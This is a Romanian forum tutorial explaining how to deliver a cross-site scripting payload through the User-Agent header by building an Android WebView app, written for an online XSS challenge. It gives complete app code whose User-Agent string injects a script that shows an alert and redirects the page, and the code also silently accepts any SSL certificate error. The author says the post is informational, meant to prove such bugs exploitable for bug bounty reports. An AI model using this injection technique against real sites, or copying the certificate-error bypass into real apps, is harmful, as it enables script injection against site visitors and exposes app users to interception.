Jump to content
TheTime

[#] UserAgent XSS folosind aplicatii Android [#]

By TheTime, in Tutoriale in romana

Recommended Posts

TheTime Newbie

TheTime

Posted
Posted

Worm32 a creat de curand un XSS Challenge in care trebuia sa iti modifici UserAgent-ul (UA) pentru a putea obtine XSS-ul.

Toate bune si frumoase atunci cand este vorba de UA-ul tau, exista extensii care fac toata treaba, dar scopul unui XSS este sa executi scriptul pentru victime, nu pentru tine. In mod normal, nu avem access la UA-ul altor persoane, dar exista alternative: aplicatiile pentru android.

Aplicatiile pentru android au un control numit WebView care nu face altceva decat sa iti incarce in aplicatie o pagina web sau un cod html propriu, oarecum asemanator cu un iframe. Este destul de bogat in optiuni si bine documentat, deci nu veti avea prea mari probleme in a va juca cu el. De asemenea, are si o setare, setUserAgentString(), care va permite sa modificati UA-ul utilizatorilor.

Ca proof of concept, am creat un proiect simplu, UAxss, cu un layout ce contine webview-ul si o clasa main ce contine codul.

activity_main.xml

 <?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    android:orientation="horizontal" 
    android:layout_gravity="center">

    <WebView
        android:id="@+id/webView1"
        android:layout_width="fill_parent"
        android:layout_height="fill_parent"
        android:layout_gravity="center" 
        android:orientation="horizontal" />

</LinearLayout>

MainActivity.java


package com.example.uaxss;

import android.net.http.SslError;
import android.os.Bundle;
import android.app.Activity;
import android.webkit.SslErrorHandler;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class MainActivity extends Activity {

	WebView wb; // <-- webview-ul nostru

	private class XSSWebViewClient extends WebViewClient {
       @Override
       public boolean shouldOverrideUrlLoading(WebView view, String url) {
           return false;
       }

       @Override
       public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {
          handler.proceed(); // in cazul in care apare vreo eroare ssl, o ignoram
       }
   }
   /** Called when the activity is first created. */

@Override
   public void onCreate(Bundle savedInstanceState) {
       super.onCreate(savedInstanceState);
       setContentView(R.layout.activity_main);      
       wb=(WebView)findViewById(R.id.webView1); //cautam webview-ul din layout-ul nostru

       //setam UA-ul
       wb.getSettings().setUserAgentString("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) --> <script>var oVariabila = setTimeout( function() { alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, 5000)</script> <!--");
       wb.getSettings().setJavaScriptEnabled(true); //ca sa putem executa javascript in pagina

       //ceva setari suplimentare
       wb.getSettings().setLoadWithOverviewMode(true);
       wb.getSettings().setUseWideViewPort(true);
       wb.getSettings().setBuiltInZoomControls(true);

       wb.setWebViewClient(new XSSWebViewClient(){});  
       wb.setWebChromeClient(new WebChromeClient());   //pentru javascript:alert()
       wb.loadUrl("http://worm32.zz.mu/challenges/");  //adresa de start      
   }
}

Si, ca sa putem accesa internetul din aplicatie, trebuie sa adaugam in AndroidManifest.xml 

<uses-permission android:name="android.permission.INTERNET" />

Dupa cum se poate observa, pentru challenge-ul lui Worm32 am folosit urmatorul UA, care executa un alert dupa 5 secunde, apoi redirectioneaza catre google.com:

"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0) --> <script>var oVariabila = setTimeout( function() { alert('Guess what? IT WORKS!'); window.location = 'http://www.google.ro' ;}, 5000)</script> <!--"

Cateva imagini:

Screenshot_2013_05_12_06_05_35.png

Screenshot_2013_05_12_06_05_40.png

Bonus:

Screenshot_1.png

^ Stiu ei ce stiu...

Testat in simulator pe Android 4.2.2 si pe tableta cu Android 4.0.4. Aveti nevoie de Android 2.3.3+ ca sa va mearga.

Download: Proiectul in Eclipse ADT si UAxss.apk

Bonus2: alt site care nu filtreaza UA-ul, observati, va rog, ironia...

Informatiile prezentate mai sus au rol pur informativ. Le-am publicat ca sa aveti un argument bun in cazul in care vreun program de bug bounty va respinge vreun astfel de xss pe motiv ca nu este exploatabil.

Stay safe!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...